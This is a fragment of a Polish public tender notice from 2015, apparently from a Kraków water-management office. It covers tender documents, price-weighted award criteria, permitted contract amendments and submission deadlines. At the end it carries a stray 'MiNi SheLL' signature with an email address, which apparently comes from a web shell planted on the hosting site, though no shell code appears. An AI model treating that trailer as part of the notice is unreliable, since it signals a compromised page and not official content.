6.1. oświadczenie innego podmiotu o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 
6.2.dla weryfikacji osoby (reprezentacji) /innego podmiotu podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.kosztorys ofertowy
8.dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony.
2. Z zastrzeżeniem formy przewidzianej w ust.1, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie:
a). zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. 
b). zmiany kont bankowych,	
c). wystąpienie oczywistych omyłek pisarskich  i rachunkowych w treści umowy.
d)	w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona
e). obniżenia wynagrodzenia, o którym mowa §3 ust.1,
f). zmiany  terminu wykonania umowy z zastrzeżeniem ust.3
3. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2015 godzina 08:00, miejsce: w siedzibie zamawiającego Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 pok.32A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com